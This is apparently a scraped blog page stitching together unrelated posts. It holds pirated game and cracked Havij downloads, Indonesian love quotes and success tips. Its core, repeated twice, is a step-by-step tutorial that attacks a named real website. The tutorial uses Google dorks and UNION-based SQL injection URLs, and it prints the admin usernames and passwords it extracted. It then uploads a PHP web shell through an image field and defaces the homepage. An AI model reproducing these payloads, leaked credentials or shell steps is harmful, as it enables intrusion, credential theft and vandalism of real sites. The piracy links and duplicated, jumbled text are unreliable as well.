Metasploit Over Internet New
Hi Friends,
Today i am sharing a very usefull video tutorial for penetration tester,
Using Metasploit over internet ( WAN ) this video was made by My Friend Zahid Adeel Aka Expl( )it3r-Z
In this video he demonstrated that how to attack a machine on wan by setting up our own server and then sending the address of our server to the victim.
Thing's Needed :
1) Backtrack.
If you are on windows then download Metasploit.
2) Port Forwards
3) A Brain ( Most Important )
IMPORTANT NOTE :
This is only for educational purpose we are not responsible what you do with it or what harm will be effected to other's so be patient..........
Using Metasploit over internet ( WAN ) this video was made by My Friend Zahid Adeel Aka Expl( )it3r-Z
In this video he demonstrated that how to attack a machine on wan by setting up our own server and then sending the address of our server to the victim.
Thing's Needed :
1) Backtrack.
If you are on windows then download Metasploit.
2) Port Forwards
3) A Brain ( Most Important )
IMPORTANT NOTE :
This is only for educational purpose we are not responsible what you do with it or what harm will be effected to other's so be patient..........
Download Havij 1.15 Pro - New
Havij is an automated sql injector tools which was made my itsec team it is mostly used automated injector in windows operating system.
Havij has a very friendly interface any one can addict to it but it is a bit slow if your target has some goods waf ( web appliction firewall ) so the chances are 40% by havij that you can inject it with havij,
But in the beginning stage I prefer you to use havij if you are not familiar with manual sql injection.
INTERFACE :
To get the pro version just read the instruction given in the rar archive and registered your havij copy to pro version in just simple 5 steps..
MediaFire Download Link
Password : pakmadhunters
Don't forget to comment or giving your precious feedback :)
New Ghost Recon-Future Soldier
Ghost Recon Future Soldier is a very amazing Action + Shooting Game with most advanced physX structure ,Ghost Recon serious has made by UBI Soft Tom Clancy.Before that The Ghost Recon Advance Warfighter 2 was also get hit but in these make of tom clancy there are more advance weapons and sturctures used regarding the advance warfighter 2 the graphics of this game is just amazing and you will addict to it if you are a shooting game lover in these make they have used some new things which was not in warfighter 2 like camo which is an invisible shield while you are in crouching mode a drone etc.
You are a member of a team consist of 4 Soldiers which do not fear from anything and can server there nation with braveness and blah blah blah that's enough xD
SCREENSHOTS :
DOWNLOAD :
The download link i am providing is a torrent file so first of all download Bittorrent or Utorrent then click on the link given below to download the game :D
Rockstar GTA IV ( High Speed )
INTRODUCTION :
Rockstar
is known for developing fast paced games and this time, the New York
based gaming firm has come out with its latest release, Grand Theft Auto IV.
The latest in the gaming line marks the fourth era in the Grand Theft
Auto series. It is an open-world action-adventure video game set in the
fictional town of Liberty City, which is similar to the modern day New
York City. GTA IV showcases the elements of third-person shooter and driving games
while featuring an open-world quest for the players. Also, GTA’s latest
sequel supports multiplayer online modes, which engages more than 12
players in single game.
FEATURE'S
• Fun driving and gunplay
• Liberty City really does feel alive
• Multiplayer mode let 16 players go wild across the entire city
• Genuinely funny radio and TV shows
• Improved controls
• Various interesting missions
• Top class combat system
• Excellent graphics
• Free running
• Cool car and bikes
• Duck & cover system is great
• Vehicle damage seems more realistic
• Ragdoll physics are an excellent new feature
• The use of cellphone makes easy to access features
• Liberty City really does feel alive
• Multiplayer mode let 16 players go wild across the entire city
• Genuinely funny radio and TV shows
• Improved controls
• Various interesting missions
• Top class combat system
• Excellent graphics
• Free running
• Cool car and bikes
• Duck & cover system is great
• Vehicle damage seems more realistic
• Ragdoll physics are an excellent new feature
• The use of cellphone makes easy to access features
SCREEN SHOTS :
MINIMUM REQUIREMENT :
- OS: Windows Vista - Service Pack 1 / XP - Service Pack 3
- Processor: Intel Core 2 Duo 1.8Ghz, AMD Athlon X2 64 2.4Ghz
- Memory: 1.5GB, 16GB Free Hard Drive Space
- Video Card: 256MB NVIDIA 7900 / 256MB ATI X1900
RECOMMENDED REQUIREMENT :
- OS: Windows Vista - Service Pack 1 / XP - Service Pack 3
- Processor: Intel Core 2 Quad 2.4Ghz, AMD Phenom X3 2.1Ghz
- Memory: 2 GB (Windows XP) 2.5 GB (Windows Vista)
- 18 GB Free Hard Drive Space
- Video Card: 512MB NVIDIA 8600 / 512MB ATI 3870
IMPORTANT NOTE :
The download link am providing here is a torrent file so first download BitTorrent or Utorrent in order to download the game without any problem :)
Sqli Hacking + Friendly Tutorial
A tutorial By one
of my best friend this tutorial will guide you that how you can use sqli
vulnerability to hack a target :D noob friendly tut :D
Like Hajiv.blogspot.com official team Admin.
So let's start,
1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION
2) UPLOADING SHELL
3) DEFACE/HACK IT
-------------------------------------------------------------------------------------------------
1st step find a sql vulnerable site !
for finding a site to hack u will need google.com
we will use google dork to find sites
dork will be INURL:
the task of this dork iss to find the giving words in URL ADDRESSES
so it will find the giving words in website's url address bar
goto google.com
type this
inurl:news.php?nws=
this search will show the sites having the page of news.php?nws=
now you got so many result at page !
now open 1st site
like mine is http://www.area96.it/news.php?nws=61
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.area96.it/news.php?nws=61'
nothing change ?
try to add before number
http://www.area96.it/news.php?nws=%2761
still nothing happened ?
http://www.area96.it/news.php?nws"61
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.area96.it/news.php?nws=61'
by adding this ' the result of page changed !
now you can see this msg on page !
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.area96.it/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean there is no 7 column in this !
so there are 6 column !
we got the column we will find the vulnerbale column now !
write
http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
still the same ?
add - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-
now
2
1
6
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-
and after 6 add "from Information_schema.tables"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
now enter
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,
these are tables
now we need to guess which table can contain username and password information !
i guess "login"
so we will see login table 1st !
now we will send the query to open login table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
108 111 103 105 110
now change it to
CHAR(108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-
the page show the result
id_login,username,password,email,admin,abilitato,id_friends
this mean these are the columns of table "login"
we need only username and password to login at admin panel so
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all words and add "login"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--
the page show this result
davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0
mean
1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion
etc
now we have the password we will move to admin panel to hack website-----
-------------------------------------------------------------------------------------------------
step 4:
goto
http://www.area96.it/admin/index.php
and login with the username and password u just got !
username=davide
password=cippalippa
logged in successfully !
now you have access to change website products news etc ......
but to take fully control we need to upload shell in the webstie !
shell: shell is a kind of control panel which give you access to do whatever you want in the site !
shell is scripted in that way to give access you to do whatever u want to do with the hardrive of website !
there are so many shell available but i will use and recommand u to use
MADSPOTSHELL
its a 1st pakistani and the world best shell !
you can download it from here
http://www.mediafire.com/?8b6dmgdo7edkus2
now find any area from where u can upload this shell like
add image add product etc
i have an option here for add news !
and it give me option of adding image of news !
i will try to upload madspotshell.php from image upload section !
just enter the news it will ask for image select madspotshell.php instead of any image !
upload successfully !
now just find the shell location!
normally it show an error icon on the image !
right click on error icon select copy image url/copy image location
and paste it to the url address like mine is
http://www.area96.it/images/news/1352954638mad.php
hit enter !
shell opened !
now you can remove add edit anyfile from here !
-------------------------------------------------------------------------------------------------
last step :
now u are in shell !
u need to hack this site !
the site default page is index
when ever you open a site like the target site is
http://www.area96.it/
it run on http://www.area96.it/index.php
so you will need to change the index.php file
in the shell u are in the directory where shell is uploaded !
like i uploaded ma shell from image section so it is in
http://www.area96.it/images/news/
at the low top
u can see this
PWD: /home/area96/area96.it/images/news/ |CURRENT|
which is showing ure current directory
u need to edit index.php which is located at area96.it
so click on area96.it from
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line
it will open the PWD: /home/area96/area96.it/ |CURRENT|
directory !
now at the center u can see the files located in the folder !
also index.php
just rename ure deface page to index.php and upload it here !
it will over write the file and when someone open the site it will show your deface page at the site instead the site !
upload button is at the botton of the shell !
just replace ure index.php to /home/area96/area96.it/ |CURRENT
and the site is hacked!
now open the website and see ure name is there or not !
http://www.area96.it/
Hacked BY Hajiv.blogspot.com
----------------------------------------------------------------------------------------------
NOTE : this post is just to share the knowledge and and for education purpose only the No1 Will be responsible if you do something stupidly and get caught by cops !
try at your own risk
-----------------------------------------------------------------------------------------------
karna 60% blog ini bnyk org barat jadi saya pakai bahasa inggris
Like Hajiv.blogspot.com official team Admin.
So let's start,
1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION
2) UPLOADING SHELL
3) DEFACE/HACK IT
-------------------------------------------------------------------------------------------------
1st step find a sql vulnerable site !
for finding a site to hack u will need google.com
we will use google dork to find sites
dork will be INURL:
the task of this dork iss to find the giving words in URL ADDRESSES
so it will find the giving words in website's url address bar
goto google.com
type this
inurl:news.php?nws=
this search will show the sites having the page of news.php?nws=
now you got so many result at page !
now open 1st site
like mine is http://www.area96.it/news.php?nws=61
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.area96.it/news.php?nws=61'
nothing change ?
try to add before number
http://www.area96.it/news.php?nws=%2761
still nothing happened ?
http://www.area96.it/news.php?nws"61
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.area96.it/news.php?nws=61'
by adding this ' the result of page changed !
now you can see this msg on page !
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.area96.it/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean there is no 7 column in this !
so there are 6 column !
we got the column we will find the vulnerbale column now !
write
http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
still the same ?
add - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-
now
2
1
6
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-
and after 6 add "from Information_schema.tables"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
now enter
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,
these are tables
now we need to guess which table can contain username and password information !
i guess "login"
so we will see login table 1st !
now we will send the query to open login table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
108 111 103 105 110
now change it to
CHAR(108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-
the page show the result
id_login,username,password,email,admin,abilitato,id_friends
this mean these are the columns of table "login"
we need only username and password to login at admin panel so
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all words and add "login"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--
the page show this result
davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0
mean
1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion
etc
now we have the password we will move to admin panel to hack website-----
-------------------------------------------------------------------------------------------------
step 4:
goto
http://www.area96.it/admin/index.php
and login with the username and password u just got !
username=davide
password=cippalippa
logged in successfully !
now you have access to change website products news etc ......
but to take fully control we need to upload shell in the webstie !
shell: shell is a kind of control panel which give you access to do whatever you want in the site !
shell is scripted in that way to give access you to do whatever u want to do with the hardrive of website !
there are so many shell available but i will use and recommand u to use
MADSPOTSHELL
its a 1st pakistani and the world best shell !
you can download it from here
http://www.mediafire.com/?8b6dmgdo7edkus2
now find any area from where u can upload this shell like
add image add product etc
i have an option here for add news !
and it give me option of adding image of news !
i will try to upload madspotshell.php from image upload section !
just enter the news it will ask for image select madspotshell.php instead of any image !
upload successfully !
now just find the shell location!
normally it show an error icon on the image !
right click on error icon select copy image url/copy image location
and paste it to the url address like mine is
http://www.area96.it/images/news/1352954638mad.php
hit enter !
shell opened !
now you can remove add edit anyfile from here !
-------------------------------------------------------------------------------------------------
last step :
now u are in shell !
u need to hack this site !
the site default page is index
when ever you open a site like the target site is
http://www.area96.it/
it run on http://www.area96.it/index.php
so you will need to change the index.php file
in the shell u are in the directory where shell is uploaded !
like i uploaded ma shell from image section so it is in
http://www.area96.it/images/news/
at the low top
u can see this
PWD: /home/area96/area96.it/images/news/ |CURRENT|
which is showing ure current directory
u need to edit index.php which is located at area96.it
so click on area96.it from
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line
it will open the PWD: /home/area96/area96.it/ |CURRENT|
directory !
now at the center u can see the files located in the folder !
also index.php
just rename ure deface page to index.php and upload it here !
it will over write the file and when someone open the site it will show your deface page at the site instead the site !
upload button is at the botton of the shell !
just replace ure index.php to /home/area96/area96.it/ |CURRENT
and the site is hacked!
now open the website and see ure name is there or not !
http://www.area96.it/
Hacked BY Hajiv.blogspot.com
----------------------------------------------------------------------------------------------
NOTE : this post is just to share the knowledge and and for education purpose only the No1 Will be responsible if you do something stupidly and get caught by cops !
try at your own risk
-----------------------------------------------------------------------------------------------
karna 60% blog ini bnyk org barat jadi saya pakai bahasa inggris
Tutorial Hacking Backtrack 341 halaman Lengkap
[Bahasa Indonesia ]
hallo sobat, kali ini saya mau kasih tutorial hacking nih, yang suka usil-usil tapi inget jangan disalah gunain ya…
tutorial yang mau saya kasih berjumlah 341 halaman, WOOWW banyak banget…. capek bacanya.. tapi kalo bener-bener dibaca sambil praktek pasti bisa.
tutorial disini saya dapet dari forum indonesianbactrack.or.id dan menggunakan Operating System Backtrack 5.
kalo mau baca di blog ini gakpapa soalnya udah dikasih dibawah ini tinggal dibaca, kalo mau download juga boleh..
untuk lihat lewat scribd bisa kesini
Kalo mau download juga bisa disini
[Bahasa Inggris ]
hello my friend, this time I want to love ya hacking tutorials, which like nosy-nosy but do not remember incorrectly gunain yes ...
I would love a tutorial which totaled 341 pages, WOOWW loads .... tired of reading .. but if he was really reading practice can.
tutorial here I get from the forum indonesianbactrack.or.id and use Backtrack 5 Operating System.
if you want to read this blog because you've given gakpapa live read below, if you want to download may also ..
to see through Scribd get here
If you want to download also here
hello my friend, this time I want to love ya hacking tutorials, which like nosy-nosy but do not remember incorrectly gunain yes ...
I would love a tutorial which totaled 341 pages, WOOWW loads .... tired of reading .. but if he was really reading practice can.
tutorial here I get from the forum indonesianbactrack.or.id and use Backtrack 5 Operating System.
if you want to read this blog because you've given gakpapa live read below, if you want to download may also ..
to see through Scribd get here
If you want to download also here
Kata-Kata Cinta Romantis Terbaru
Alhamdulillah
yaah ? Dan ngomongin masalah Kata kata bermakna Cinta, Kata-Kata Cinta
Indah?? memang ini adalah Santapan lezatnya om Admin. Contoh Dari Kata Kata Mutiara Cinta Romantis adalah sebagai berikut :
Hidup terlalu
singkat jika terus mengenang cintamu di masa lalu, disaat kamu bisa
menciptakan cerita baru dengan yang mencintaimu.
Salah satu keputusan tersulit dalam cinta adalah ketika kamu harus memilih untuk bertahan atau melepaskan.
Semua orang tahu bagaimana mencinta, tapi hanya sebagian orang yg tahu bagaimana tetap tinggal di satu hati tuk jangka waktu yg lama.
Lebih baik mencintai seseorang yang jauh tapi sangat menginginkan kebersamaan daripada seseorang yang dekat tapi tak peduli
Mencintaimu memang membutuhkan ketulusan, tulus mencintaimu & tulus merelakanmu pergi dari hidupku
Jatuh cinta denganmu adalah hal yg mudah. Tapi untuk tetap mencintaimu perlu usaha keras...
Dalam cinta, kamu tak perlu MENCARI orang yang tepat, tapi yang kamu perlukan adalah MENJADI orang yang tepat bagi dia yang kamu cinta.
Salah satu keputusan tersulit dalam cinta adalah ketika kamu harus memilih untuk bertahan atau melepaskan.
Semua orang tahu bagaimana mencinta, tapi hanya sebagian orang yg tahu bagaimana tetap tinggal di satu hati tuk jangka waktu yg lama.
Lebih baik mencintai seseorang yang jauh tapi sangat menginginkan kebersamaan daripada seseorang yang dekat tapi tak peduli
Mencintaimu memang membutuhkan ketulusan, tulus mencintaimu & tulus merelakanmu pergi dari hidupku
Jatuh cinta denganmu adalah hal yg mudah. Tapi untuk tetap mencintaimu perlu usaha keras...
Dalam cinta, kamu tak perlu MENCARI orang yang tepat, tapi yang kamu perlukan adalah MENJADI orang yang tepat bagi dia yang kamu cinta.
Kata Kata Mutiara Cinta
Paling Romantis 2013
Paling Romantis 2013
Masalah adalah cara Tuhan
untuk membuatmu
dewasa, maka janganlah lari dari
mereka tapi hadapilah.
Hanya mereka yg
membuatmu bijaksana.
Apa yang hilang darimu,
relakanlah. Jangan
mengeluh. Percayalah
Tuhan telah menyediakan
yang lebih baik.
Jika seseorang telah yakin
dan berserah sepenuhnya
akan kebesaran Tuhan,
maka Tuhan akan
membimbing
kehidupannya.
Ia yang bersyukur dalam
kekurangan adalah ia yang
memiliki kemuliaan hati.
Hanya dengan mengubah
sikap dan pandanganmu
saja, kamu bisa mengubah
yg terburuk menjadi yg
terbaik.
Jika ia yg terbaik
untukmu, ia tak akan
menyakitimu. Tak perlu
meratapi orang yg sudah
melukaimu, biarkan ia
pergi. Trkdg seseorg hrs
melukaimu cukup dlm utk
membuatmu menyadari
betapa indahnya hidupmu
tanpa dia di dalamnya.
Apapun akan lebih mudah
disampaikan, jika disertai
dengan senyuman,
dibanding dengan ucapan
kasar.
Dalam hidup, tak ada
seorangpun yg mampu
buatmu tersenyum tanpa
alasan, kecuali dia yg selalu
kamu pikirkan.
Entah kamu berpikir
hidupmu baik atau buruk,
itu akan benar terjadi,
karena pikiranmu akan
membawamu ke sana.
Hal yg sulit tuk memaksa
dirimu melupakan hal yg
pernah membuatmu
bahagia, hanya karena ia
telah berakhir.
Adalah sikap yg kurang
terpuji, ketika kita
tertawa sementara sahabat
kita ada yg tengah
bersedih.
Ketika yang dimiliki telah
lepas dari genggaman,
disaat itulah kau akan
merasa sangat kehilangan.
Untuk itu, jaga yg kau
miliki!
untuk membuatmu
dewasa, maka janganlah lari dari
mereka tapi hadapilah.
Hanya mereka yg
membuatmu bijaksana.
Apa yang hilang darimu,
relakanlah. Jangan
mengeluh. Percayalah
Tuhan telah menyediakan
yang lebih baik.
Jika seseorang telah yakin
dan berserah sepenuhnya
akan kebesaran Tuhan,
maka Tuhan akan
membimbing
kehidupannya.
Ia yang bersyukur dalam
kekurangan adalah ia yang
memiliki kemuliaan hati.
Hanya dengan mengubah
sikap dan pandanganmu
saja, kamu bisa mengubah
yg terburuk menjadi yg
terbaik.
Jika ia yg terbaik
untukmu, ia tak akan
menyakitimu. Tak perlu
meratapi orang yg sudah
melukaimu, biarkan ia
pergi. Trkdg seseorg hrs
melukaimu cukup dlm utk
membuatmu menyadari
betapa indahnya hidupmu
tanpa dia di dalamnya.
Apapun akan lebih mudah
disampaikan, jika disertai
dengan senyuman,
dibanding dengan ucapan
kasar.
Dalam hidup, tak ada
seorangpun yg mampu
buatmu tersenyum tanpa
alasan, kecuali dia yg selalu
kamu pikirkan.
Entah kamu berpikir
hidupmu baik atau buruk,
itu akan benar terjadi,
karena pikiranmu akan
membawamu ke sana.
Hal yg sulit tuk memaksa
dirimu melupakan hal yg
pernah membuatmu
bahagia, hanya karena ia
telah berakhir.
Adalah sikap yg kurang
terpuji, ketika kita
tertawa sementara sahabat
kita ada yg tengah
bersedih.
Ketika yang dimiliki telah
lepas dari genggaman,
disaat itulah kau akan
merasa sangat kehilangan.
Untuk itu, jaga yg kau
miliki!
Ya Ampun.... Sungguh dibuat terharu banget nih, sobat -sobat muda, kebetulan , pas Bikin postingan ini, Si Admin SEOSTATS Lagi PDKT ceritanya sama orang Deket juga sih. Mudah mudahan Kata-Kata Cinta Romantis Terbaru nya bisa membuat PINTU Hati Dia Dibukakan. Amiiin
Ciri-Ciri Orang Yang Sukses
Semua
orang ingin meraih kesuksesan, tetapi tidak
semudah memotong kuku untuk menjadi seseorang yang sukses. Sukses itu
butuh
usaha, kerja keras, pantang menyerah dan yang paling penting adalah
berdo'a. Saya mendapatkan post ini dari berbagai sumber diinternet dan
dibawah ini merupakan kriteria seseorang yang dikemudian hari akan
menjadi
seorang yang sukses dalam karier dan hidupnya. Percaya atau tidak, itu
hak
anda.. Berikut kriteria calon orang sukses :
1. Punya tujuan hidup
Tujuan hidup adalah sebuah hal yang ingin dilakukan di masa mendatang. Ketika Anda bertanya apa
tujuan hidupnya, ia akan menjelaskan secara rinci kepada Anda rencana jangka
pendek dan menengahnya, apa yang ingin ia lakukan setahun mendatang, lima
tahun, dan seterusnya. Bahkan,
ia menyiapkan rencana cadangan untuk
mengantisipasi kegagalan. Tidak hanya menjawab, "Kita lihat saja nanti,
jalani saja hidup ini seperti air mengalir." Jawaban itu hanya
dikeluarkan oleh orang-orang yang tidak mempunyai tujuan hidup yang
jelas.
2. Mandiri
Ia tidak bergantung pada
orang lain dan mengandalkan kemampuan sendiri dalam hal apa pun. Misalnya,
sejak awal mula bekerja, ia menanggung sendiri biaya hidupnya tanpa bantuan
orangtuanya. Pria seperti ini menunjukkan bahwa ia bertanggung jawab atas
hidupnya dan hidup orang yang ia sayangi. Dia juga tak pernah mengeluh
mengenai pekerjaannya. Karena ia sadar, untuk mencapai kesuksesan, tentu
dibutuhkan usaha dan kerja keras.
3. Hobi menolong
Anda tentu pernah
mendengar ungkapan semakin banyak memberi, akan semakin banyak menerima.
Percaya atau tidak, ungkapan ini memang ada benarnya. Jadi, bila pasangan
termasuk pria yang ringan tangan membantu orang lain, Anda perlu berbangga hati
mendukungnya. Sebab, ini akan menjadi bekal atau tabungan untuk menuju
kesuksesannya di masa depan. Siapa tahu seseorang yang ia bantu saat ini
berperan penting dalam kariernya di kemudian hari.
4. Bersahabat dan berwawasan
Sikapnya yang bersahabat
ditambah dengan wawasan luasnya biasanya akan mudah mengambil hati banyak
orang, termasuk saat melobi orang-orang penting yang berkaitan dengan
kariernya. Pengetahuannya tentang berbagai hal termasuk berita-berita terkini
akan membuat orang lain merasa nyaman berdiskusi dengannya. Semakin banyak
orang tertarik padanya, semakin luas juga networking-nya. Kalau sudah begini,
Anda tak perlu khawatir dengan kualitas diri yang dimiliki si dia, kesuksesan
pun akan segera menghampiri.
5. "Family man"
Pria yang bertanggung
jawab dan menyayangi keluarganya biasanya adalah pria yang juga memerhatikan
perkembangan kariernya. Ia akan selalu termotivasi meningkatkan karier lebih
baik lagi untuk memenuhi kebutuhan keluarganya. Selain itu, pria tipe ini
cenderung setia pada pasangannya sehingga ia bisa menyeimbangkan waktu dan
pikirannya untuk Anda dan pekerjaannya.
6. Memiliki investasi
Saat ini gaji si dia tak
bisa dibilang besar? Tak perlu khawatir selama ia bisa mengatur pendapatannya
dan tak selalu kehabisan uang di tengah bulan. Apalagi bila ia termasuk orang
yang jeli melihat peluang bisnis. Tak perlu terlalu besar, berangkat dari bisnis
kecil-kecilan pun bisa mengantarkannya menjadi pengusaha sukses. Dukung
sepenuhnya ketika dia memiliki keinginan untuk mencicil rumah atau berinvestasi
dalam bentuk lain, seperti saham atau reksa dana. Karena ini menunjukkan si dia
sangat memikirkan masa depan.
7. Realistis dan lurus
Meskipun si dia
bersemangat meraih mimpinya, tetap amati bagaimana usahanya meraih impian,
jangan sampai si dia menghalalkan berbagai cara yang justru bisa menghancurkan
masa depannya. Ingatkan untuk tetap realistis dengan kemampuan yang
dimilikinya. Bila si dia ahli dalam bidang teknologi informatika, ia tak perlu
memaksakan diri untuk menjadi seorang public relations karena tertarik melihat
temannya yang sukses di bidang tersebut. Masing-masing orang kan memiliki kelebihan
yang berbeda-beda.
8. Optimistis dan positif
Ia sangat tahu apa yang
menjadi kelebihan dan kekurangannya sehingga ia selalu percaya diri saat
berinteraksi dengan orang lain ataupun ketika diberikan tanggung jawab baru. Ia
hampir tak pernah berkata "tidak bisa" atau "malas deh
melakukannya". Ia selalu berpikir positif dan optimistis bahwa setiap
tantangan yang datang pasti ada solusinya. Selain itu, ia juga terbiasa fokus
dalam melakukan sesuatu sehingga tak cepat menyerah saat mengalami kegagalan.
Download Harvest Moon Wonderful Full Version
Weleh-weleh jaman sekarang masih banyak yg suka games ps yah hi sobat sesuai request saya akan share games ps yg gak asing harvest moon games ini menarik sekali walau udah ketinggalan jaman games simulasi bagaimana sobat hidup mandiri sebagai seorang petani dan menemukan pendamping hidup sampai akhir hidupnya yg berminat monggo etss...
ScreenShoot :
Download :
Size : 104MB
================================
MEDIAFIRE LINK
part 1
part 2
part 3
part 4
pass :
pass update : andang keren
================================
EMULATOR PCSX2 Size : 8.5MB
download here
================================
Auto Followers Twitter Terbaru 2013

